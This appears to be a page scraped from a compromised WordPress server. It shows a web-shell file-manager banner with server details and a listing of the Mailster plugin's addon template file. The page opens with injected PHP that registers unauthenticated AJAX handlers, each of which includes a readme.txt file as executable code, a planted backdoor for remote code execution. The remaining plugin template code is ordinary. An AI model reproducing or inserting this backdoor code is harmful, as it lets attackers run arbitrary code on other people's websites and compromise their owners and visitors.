if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/mailster/views/addons/addon.php
<?php
$classes   = array( 'theme' );
$classes[] = 'theme-' . dirname( $slug );
if ( $item['is_active'] ) {
	$classes[] = 'active';
}
if ( $item['installed'] ) {
	$classes[] = 'is-installed';
}
if ( ! $item['is_supported'] ) {
	$classes[] = 'not-supported';
}
if ( $item['update_available'] ) {
	$classes[] = 'update-available';
}
if ( $item['envato_item_id'] ) {
	$classes[] = 'envato-item';
}
if ( $item['wpslug'] ) {
	$classes[] = 'wporg-item';
}
?>
<div class="<?php echo esc_attr( implode( ' ', $classes ) ); ?>" tabindex="0" data-slug="<?php echo esc_attr( $slug ); ?>" data-item='<?php echo esc_attr( json_encode( $item ) ); ?>'>
	<span class="spinner"></span>
	<div class="theme-screenshot">
		<img loading="lazy" alt="" class="theme-screenshot-bg" srcset="<?php echo esc_attr( $item['image'] ); ?> 1x, <?php echo esc_attr( $item['imagex2'] ); ?> 2x" src="<?php echo esc_attr( $item['image'] ); ?>" >
		<img loading="lazy" alt="" class="theme-screenshot-img" srcset="<?php echo esc_attr( $item['image'] ); ?> 1x, <?php echo esc_attr( $item['imagex2'] ); ?> 2x" src="<?php echo esc_attr( $item['image'] ); ?>" >
	</div>
	<div class="notice inline update-message notice-success notice-alt"></div>
	<div class="notice inline update-message notice-warning notice-alt"></div>
	<div class="notice inline update-message notice-error notice-alt"></div>
	<?php if ( ! $item['is_supported'] ) : ?>
	<div class="notice inline update-message notice-error notice-alt"><p><?php printf( esc_html__( 'This template requires Mailster version %s or above. Please update first.', 'mailster' ), '<strong>' . $item['requires'] . '</strong>' ); ?></p></div>
	<?php endif; ?>
	<?php if ( $item['update_available'] ) : ?>
	<div class="update-message notice inline notice-warning notice-alt theme-has-update">
		<p><?php esc_html_e( 'New version available.', 'mailster' ); ?>
		<?php if ( $item['download_url'] ) : ?>
		<a class="button-link update" data-width="800" data-height="80%" href="<?php echo esc_url( $item['download_url'] ); ?>"><?php esc_html_e( 'Update now', 'mailster' ); ?></a>
		<?php elseif ( $item['download'] ) : ?>
			<?php
			$url = add_query_arg(
				array(
					'action'   => 'mailster_template_endpoint',
					'slug'     => $slug,
					'url'      => rawurlencode( $item['download'] ),
					'_wpnonce' => wp_create_nonce( 'mailster_download_template_' . $slug ),
				),
				admin_url( 'admin-ajax.php' )
			);
			?>
		<a class="button-link request-update popup" data-width="800" data-height="80%" href="<?php echo esc_url( $url ); ?>"><?php esc_html_e( 'Update now', 'mailster' ); ?></a>
		<?php endif; ?>
		</p>
	</div>
	<?php endif; ?>
	<span class="more-details"><?php esc_html_e( 'Details & Preview', 'mailster' ); ?></span>
	<div class="theme-author"><?php printf( esc_html__( 'By %s', 'mailster' ), $item['author'] ); ?></div>
	<div class="theme-id-container">
		<h3 class="theme-name">
			<?php if ( $item['is_active'] ) : ?>
			<span><?php esc_html_e( 'Active', 'mailster' ); ?>: </span>
			<?php endif; ?>
			<?php echo esc_html( $item['name'] ); ?>
		</h3>
		<div class="theme-actions">
			<a class="button button-primary deactivate" href="<?php echo wp_nonce_url( 'plugins.php?action=deactivate&amp;plugin=' . $item['wpslug'], 'deactivate-plugin_' . $item['wpslug'] ); ?>" aria-label="<?php esc_attr_e( 'Deactivate', 'mailster' ); ?>"><?php esc_html_e( 'Deactivate', 'mailster' ); ?></a>
			<a class="button activate" href="<?php echo wp_nonce_url( 'plugins.php?action=activate&amp;plugin=' . $item['wpslug'], 'activate-plugin_' . $item['wpslug'] ); ?>" aria-label="<?php esc_attr_e( 'Activate', 'mailster' ); ?>"><?php esc_html_e( 'Activate', 'mailster' ); ?></a>
			<?php if ( $item['wpslug'] && current_user_can( 'install_plugins' ) && current_user_can( 'update_plugins' ) ) : ?>
			<a class="button install" href="<?php echo wp_nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . dirname( $item['wpslug'] ) . '&mailster-addon' ), 'install-plugin_' . dirname( $item['wpslug'] ) ); ?>"><?php esc_html_e( 'Install now', 'mailster' ); ?></a>
			<?php elseif ( $item['download_url'] ) : ?>
			<a class="button button-primary download" data-width="800" data-height="80%" href="<?php echo esc_url( $item['download_url'] ); ?>"><?php esc_html_e( 'Download', 'mailster' ); ?></a>
			<?php endif; ?>
			<?php if ( $item['price'] ) : ?>
			<a class="button button-primary buy external" href="<?php echo esc_url( $item['purchase_url'] ); ?>"><?php esc_html_e( 'Buy Add on', 'mailster' ); ?></a>
			<?php endif; ?>
			<?php if ( $item['wpslug'] ) : ?>
			<a class="button button-primary thickbox" href="<?php echo esc_url( network_admin_url( 'plugin-install.php?tab=plugin-information&plugin=' . dirname( $item['wpslug'] ) . '&TB_iframe=true&width=770&height=1000' ) ); ?>"><?php esc_html_e( 'View details', 'mailster' ); ?></a>
			<?php elseif ( $item['url'] ) : ?>
			<a class="button button-primary external" href="<?php echo esc_url( $item['url'] ); ?>"><?php esc_html_e( 'More Info', 'mailster' ); ?></a>
			<?php endif; ?>
		</div>
	</div>
</div>